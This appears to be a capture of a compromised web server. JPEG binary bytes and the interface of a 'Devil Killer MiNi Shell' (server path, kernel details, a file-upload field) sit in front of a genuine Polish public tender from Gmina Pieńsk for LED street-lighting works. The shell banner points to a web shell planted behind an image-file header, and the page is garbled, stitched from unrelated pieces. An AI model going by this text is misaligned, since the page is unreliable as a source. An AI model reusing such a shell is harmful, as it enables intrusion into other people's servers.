JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210716/0011701601-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00117016 z dnia 2021-07-16</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Ograniczenie niskiej emisji poprzez przebudowę oświetlenia ulicznego i drogowego na terenie gmin partnerskich Pieńsk i Węgliniec. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA PIEŃSK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821470</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bolesławiecka 29</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pieńsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-930</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">757786511-513</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">757786405</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">nowicki@piensk.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.piensk.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Ograniczenie niskiej emisji poprzez przebudowę oświetlenia ulicznego i drogowego na terenie gmin partnerskich Pieńsk i Węgliniec. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-60f2278a-e557-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00117016</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001735/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Ograniczenie niskiej emisji poprzez przebudowę oświetlenia ulicznego i drogowego na terenie gminy Pieńsk</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Regionalny Program Operacyjny Województwa Dolnośląskiego 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.piensk.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu<br/>komunikacja zamawiającego z wykonawcami odbywa się za pomocą środków komunikacji<br/>elektronicznej. Komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia,<br/>wnioski, zawiadomienia oraz informacje przekazywane są w formie elektronicznej przy użyciu mini Portalu https://miniportal.uzp.gov.pl/, e PUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej, e-mail nowicki@piensk.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)Informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania<br/>korespondencji elektronicznej:Zamawiający wymaga, aby w tytule maila był podany nr sprawy, co<br/>ułatwi komunikację pomiędzy stronami postępowania. 2) Wszelką korespondencję związaną<br/>zniniejszym postępowaniem, należy przekazywać za pośrednictwem ePUAP lub pocztyelektronicznej<br/>na adres: nowicki@piensk.com.pl Korespondencję uważa się za przekazaną w terminie, jeżeli dotrze<br/>do Zamawiającego przed upływem wymaganego terminu. 3) Wykonawca zamierzający wziąć udział w<br/>postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.Wykonawca<br/>posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku<br/>oraz do formularza do komunikacji.4) Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały wRegulaminie<br/>korzystania z miniPortalu dostępnym pod adresemhttps://miniportal.uzp.gov.pl/WarunkiUslugi.aspxoraz<br/>Regulaminie ePUAP.5) Wykonawca przystępującdo niniejszego postępowania o udzieleniezamówienia<br/>publicznego, akceptuje warunki korzystania zminiPortalu, określone w RegulaminieminiPortalu oraz<br/>zobowiązuje się korzystając z miniPortaluprzestrzegać postanowień tegoregulaminu.6) Maksymalny<br/>rozmiar plików przesyłanych zapośrednictwem dedykowanych formularzy do: złożenia i wycofania<br/>oferty oraz do komunikacji wynosi150 MB.7) Za datę przekazania oferty,oświadczenia, o którym mowa<br/>w art. 125 ust. 1 pzp,podmiotowych środków dowodowych,przedmiotowych środków dowodowych oraz<br/>innych informacji,oświadczeń lub dokumentów,przekazywanych w postępowaniu, przyjmuje się datę<br/>ich przekazania naePUAP.8) W postępowaniu o udzielenie zamówienia korespondencja elektroniczna<br/>(inna niż ofertaWykonawcy i załączniki do oferty)odbywa się elektronicznie za pośrednictwem<br/>dedykowanegoformularzadostępnego na ePUAP orazudostępnionego przez miniPortal (Formularz do komunikacji).Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana. We<br/>wszelkiejkorespondencji związanej z niniejszympostępowaniem Zamawiający i Wykonawcy posługują<br/>sięnumerem ogłoszenia (BZP).9) Dokumentyelektroniczne, oświadczenia lub elektroniczne<br/>kopiedokumentów lub oświadczeń składane są przezWykonawcę za pośrednictwem Formularza<br/>dokomunikacji jako załączniki. Zamawiający dopuszczarównież możliwość składania<br/>dokumentówelektronicznych, oświadczeń lub elektronicznych kopiidokumentów lub oświadczeń za<br/>pomocą pocztyelektronicznej, na adres email: nowicki@piensk.com.pl Sposób sporządzenia<br/>dokumentówelektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi<br/>być zgody zwymaganiami określonymi w rozporządzeniu Prezesa RadyMinistrów z dnia 30 grudnia<br/>2020 r. wsprawie sposobu sporządzania i przekazywania informacji orazwymagań technicznych<br/>dladokumentów elektronicznych oraz środków komunikacji elektronicznej wpostępowaniu o<br/>udzieleniezamówienia publicznego lub konkursie)10) Zamawiający nie przewidujesposobu<br/>komunikowania się zWykonawcami w inny sposób niż przy użyciu środków komunikacjielektronicznej,<br/>wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 RozporządzeniaParlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osóbfizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takichdanych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, zwane dalej„RODO”)<br/>(Dz.U. UE. L. 119.1 z 04.05.2016) informuję, iż:1) Administratorem danych osobowych jestPani<br/>Agnieszka Demichowicz Z administratorem można się skontaktować poprzez adres<br/>email:iod@piensk.com.pl lubpisemnie na adres siedziby administratora;2) Administrator<br/>wyznaczyłinspektora ochrony danych, zktórym może się Pani/Pan skontaktować poprzez<br/>emailiod@piensk.com.pl Z inspektorem ochronydanych można się kontaktować we wszystkich<br/>sprawachdotyczących przetwarzania danychosobowych oraz korzystania z praw związanych z<br/>przetwarzaniemdanych;3) zgodnie z treścią art. 6ust. 1 lit. c RODO Pani/Pana dane osobowe<br/>przetwarzane będą wcelu realizacji procesu wyboruwykonawcy na podstawie prowadzonego<br/>postępowania o udzieleniezamówienia publicznego, anastępnie realizacji postanowień umownych<br/>związanych z wykonywanymzamówieniem;4) w związku zprzetwarzaniem Pani/Pana danych w celach<br/>wskazanych powyżej, daneosobowe mogą byćudostępniane innym odbiorcom lub kategoriom<br/>odbiorców danych osobowych, napodstawie przepisówprawa oraz zawartych umów powierzenia<br/>przetwarzania danych, jeżeli wymaganebyłoby to w celurealizacji postanowień umownych,5) w<br/>odniesieniu do Pani/Pana danych osobowychdecyzje nie będąpodejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;6)Pani/Pana dane osobowebędą przechowywane,<br/>zgodnie z art. 97 ust. 1 ustawy – Prawo zamówieńpublicznych przez okres 4 latod dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czastrwania umowy przekracza 4lata, okres<br/>przechowywania obejmuje cały czas trwania umowy;7) posiadaPani/Pan prawo do:a)dostępu do<br/>danych osobowych, na podstawie art. 15 RODO, przy czymadministrator może żądać odosoby, której<br/>dane dotyczą, wskazania dodatkowych informacji mającychna celu sprecyzowanieżądania, w<br/>szczególności podania nazwy lub daty postępowania o udzieleniezamówieniapublicznego;b)<br/>sprostowania lub uzupełnienia danych osobowych, na podstawie art. 16RODO, przyczym skorzystanie<br/>z niniejszego uprawnienia nie może skutkować zmianą wynikupostępowania oudzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresieniezgodnym z ustawą– Prawo zamówień<br/>publicznych;c) ograniczenia przetwarzania danychosobowych, na podstawie art.18 RODO, przy czym<br/>wystąpienie z żądaniem nie ograniczaprzetwarzania danych osobowych doczasu zakończenia postępowania o udzielenie zamówieniapublicznego;d) wniesienia skargi doPrezesa Urzędu Ochrony<br/>Danych Osobowych, gdy uzna Pani/Pan,że przetwarzanie danychosobowych narusza przepisy<br/>RODO;8) nie przysługuje Pani/Panu prawo do:a)usunięcia lubprzenoszenia danych osobowych,b)<br/>wniesienia sprzeciwu wobec przetwarzania danychosobowych;9)podanie danych osobowych jest<br/>konieczne w celu realizacji postępowania o udzielenie zamówienia publicznego oraz realizacji<br/>postanowień umownych. Niepodanie danych będzie skutkowałobrakiem możliwości rozpatrzenia oferty<br/>złożonej w postępowaniu oraz zawarcia umowy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ISM.03.271.PN.10.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 3319344,42 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zadanie inwestycyjne w formie wykonania zaprojektuj i wybuduj celem ograniczenia niskiej emisji poprzez przebudowę oświetlenia ulicznego i drogowego na terenie gmin partnerskich Pieńsk i Węgliniec.<br/>W ramach zadania zostaną zrealizowane następujące roboty budowlane:<br/> 1. Wymiana istniejących opraw oświetlenia ulicznego starego typu (oprawy sodowe) na oprawy LED w ilości 1 383 szt. na terenie Gminy Pieńsk.<br/> 2. Wymiana istniejących linii oświetleniowych na terenie Gminy Pieńsk. Do wymiany przewidziano 8400m istniejących linii napowietrznych na linie izolowane typu AsXSn oraz 4120m istniejących linii kablowych na nowe linie wykonane kablami YAKY lub YAKXS <br/>w rurach osłonowych. <br/> 3. Wymiana istniejących słupów oświetleniowych na terenie Gminy Pieńsk. Do wymiany przewidziano 130szt. <br/> 4. Dobudowa oświetlenia na terenie Gminy Pieńsk (słupy ocynkowane, wysięgniki, linia kablowa, oprawa LED) przewidywana ilość to 136 nowych punktów świetlnych. <br/> 5. Wykonawca w ramach zadania zaprojektuj i wybuduj wykona również niezbędną dokumentację techniczną, uzyskując niezbędne opracowania,uzgodnienia, zgody i decyzję w tym pozwolenia na budowę. Zapewni również nadzór nad budową w postaci autora dokumentacji technicznej i funkcji kierownika budowy. Po realizacji robót budowlanych należy również sporządzić dokumentację powykonawczą wraz z niezbędnymi opracowaniami, certyfikatami, inwentaryzacjami powykonawczymi i pomiarami.<br/>WAŻNE: Szczegółowy zakres zadania opisany jest PFU i wytycznymi audytu efektywności energetycznej. Dodatkowo Zamawiający załączył ewidencje oświetlenia drogowego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31520000-7 - Lampy i oprawy oświetleniowe</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <p class="mb-0">66515000-3 - Usługi ubezpieczenia od uszkodzenia lub utraty</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-03-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin usunięcia wad i usterek w okresie gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:<br/> 1) sytuacji ekonomicznej lub finansowej<br/> Warunek będzie uznany za spełniony, jeżeli Wykonawca przedłoży dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 3 000 000,00 zł (słownie złotych: trzy miliony 00/100)<br/> 2) zdolności technicznej lub zawodowej:<br/> a) Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończone co najmniej jedną robotę budowlaną, polegającą na budowie, przebudowie, rozbudowie lub modernizacji sieci oświetlenia drogowego o wartości nie mniejszej niż 3 800 000 zł brutto. Powyższe warunki musi spełniać robota budowlana w jednym zadaniu inwestycjach.<br/> b) Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował przynajmniej jedną osobą lub osobami, które będą uczestniczyć w realizacji zamówienia posiadającymi uprawienia zgodnie z wymogami ustawy Prawo budowlane ( tekst jedn.: Dz.U. 2020r. poz. 1333) do pełnienia samodzielnych funkcji technicznych w budownictwie tj. do projektowania i kierowania robotami budowlanymi w zakresie sieci elektrycznej, bez ograniczeń.<br/>W przypadku podmiotów zagranicznych posiadających uprawnienia wydane poza terytorium Rzeczpospolitej Polskiej wymaga się od Wykonawcy, aby osoby te posiadały równoważne uprawnienia do w/w.<br/>Zamawiający uzna uprawnienia równoważne zdobyte na podstawie przepisów obowiązujących przed wejściem w życie ustawy Prawo budowlane oraz właściwych aktów wykonawczych do niniejszej ustawy– w oparciu o art. 104 ustawy z dnia 7 lipca 1994r. – Prawo budowlane (t.j. Dz. U. 2020 r. poz. 1333).<br/>Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>informacji o Działalności Gospodarczej, w zakresie art.109 ust.1 pkt 4 ustawy, sporządzonych<br/>niewcześniej niż 3miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu dorejestru lub<br/>ewidencji.2.oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5) ustawy Pzp, o<br/>brakuprzynależności do tejsamej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r.o<br/>ochronie konkurencji ikonsumentów (t.j. Dz. U. z 2020 r. poz. 1076 ze zm.), z innymwykonawcą, który<br/>złożył odrębną ofertę,ofertę częściową lub wniosek o dopuszczenie doudziału w postępowaniu, albo<br/>oświadczenia oprzynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymiprzygotowanie oferty,oferty częściowej lub wniosku o dopuszczenie do udziału w<br/>postępowaniuniezależnie odinnego wykonawcy należącego do tej samej grupy kapitałowej3. W<br/>przypadkuwykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów nazasadach<br/>określonych wart. 118 ustawy, Zamawiający żąda przedstawienia w odniesieniudo tych podmiotów<br/>dokumentwymieniony w pkt IX.4.1).4. Zamawiający żąda od wykonawcy przedstawienia<br/>dokumentówwymienionych w pktIX.4.1), dotyczących podwykonawcy, któremu zamierza powierzyć<br/>wykonanieczęścizamówienia, a który nie jest podmiotem, na którego zdolnościach lub sytuacji<br/>wykonawcapolegana zasadach określonych w art. 118 ustawy.5. W przypadku wykonawców<br/>ubiegających się wspólnie oudzielenie zamówienia, dokumentywymienione w pkt. IX.4.1) winien<br/>dołączyć każdy podmiotwystępujący wspólnie. Dokumentwinien być potwierdzony za zgodność z<br/>oryginałem i złożony w formieelektronicznejopatrzonej podpisem zaufanym lub podpisem osobistym<br/>zgodnie z § 14 ust.3Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020r.<br/>wsprawiepodmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń,<br/>jakichmożeżądać zamawiający od wykonawcy.6. Jeżeli wykonawca ma siedzibę lub miejsce<br/>zamieszkania pozaterytorium RzeczpospolitejPolskiej, zamiast dokumentów, o których mowa w pkt<br/>IX.4.1) składadokument lubdokumenty wystawione w kraju, w którym ma siedzibę lub<br/>miejscezamieszkania,potwierdzające odpowiednio, że nie otwarto jego 